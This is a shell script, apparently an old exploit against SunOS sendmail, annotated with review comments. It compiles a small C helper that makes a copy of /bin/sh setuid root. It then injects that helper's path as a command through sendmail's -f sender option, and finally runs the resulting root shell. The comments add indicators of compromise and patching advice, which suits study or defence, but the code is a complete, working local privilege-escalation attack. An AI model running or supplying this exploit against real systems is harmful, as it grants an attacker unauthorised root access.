#!/bin/sh
#
# Syntax: roption host
#
# host is any system running sendmail (except localhost).
#
# This exploits a flaw in SunOS sendmail(8), and attempts to
# create a suid root shell
#
#
#

# Name this script was invoked as; used in the usage and error messages below.
# NOTE(review): $0 is unquoted, so an invocation path containing spaces would
# be word-split before basename sees it.
PROG="`basename $0`"
# Pin the command search path to three system directories so the bare command
# names used later (uname, cat, cc, basename) are not resolved through the
# caller's PATH.
PATH=/usr/ucb:/usr/bin:/bin      export PATH
# Restrict word splitting to a single space character.
IFS=" "                          export IFS

# Require exactly one argument (the host); otherwise print the syntax line
# and exit with status 1.
if [ $# -ne 1 ]; then
        echo "Syntax: $PROG host"
        exit 1
fi

# Refuse to run unless `uname -s` reports SunOS. The leading "x" on both
# sides keeps the comparison well-formed even if uname prints nothing.
if [ "x`uname -s`" != "xSunOS" ]; then
        echo "Sorry, this only works on SunOS"
        exit 1
fi

# Second, identical assignment of PROG; it is already set near the top of
# the script, so this line is redundant.
PROG="`basename $0`"

# Base path of the helper program: the C source is written to $EXECME.c and
# the compiled binary to $EXECME.
# NOTE(review): both are fixed, predictable names in /tmp and nothing in the
# visible script removes them, so these two paths and /tmp/InfamousAngel are
# usable as host-based indicators when triaging a SunOS system.
EXECME=/tmp/HotterThanMojaveInMyHeart

# Write the helper's source to $EXECME.c. The quoted 'EOF' delimiter stops
# the shell from expanding anything inside the here-document. The helper
# (K&R-style C) sets the owner and group of /tmp/InfamousAngel to 0 and its
# mode to 04755, i.e. the setuid bit plus rwxr-xr-x. Neither call's return
# value is checked.

cat > $EXECME.c << 'EOF'
main(argc,argv)
int argc;
char *argv[];
{
        chown("/tmp/InfamousAngel", 0, 0);
        chmod("/tmp/InfamousAngel", 04755);
}
EOF

# Compile the helper with cc; the exit status of cc is not inspected here.
cc -o $EXECME $EXECME.c

# Stop with status 1 if no executable file exists at $EXECME after the
# compile step.

if [ ! -x $EXECME ]; then
        echo "$PROG: couldnt compile $EXECME.c - check it out"
        exit 1
fi

# Place a copy of /bin/sh at the path that the helper chowns and chmods.
/bin/cp /bin/sh /tmp/InfamousAngel
# Invoke sendmail with option R set to the host argument ($1), a sender
# address (-f) that embeds the helper's path between semicolons, and -t so
# the recipients are read from the headers in the here-document.
# NOTE(review): the file header attributes the effect to a flaw in SunOS
# sendmail(8); presumably the affected sendmail hands the sender address to
# a shell while still privileged, so the helper runs as root. Confirm this
# against the vendor advisory. Defensive follow-up: apply the vendor's
# sendmail fix, and audit for setuid-root files under /tmp (or mount /tmp
# nosuid where the platform supports it).

/usr/lib/sendmail -oR$1 -f";$EXECME;" -t << 'EOF'
To: No1InParticular

Hows it goin
EOF

# Replace this shell process with the copied shell. That copy is privileged
# only if the helper ran with enough privilege to chown it to uid 0 and set
# the setuid bit; the script does not verify that before exec.
exec /tmp/InfamousAngel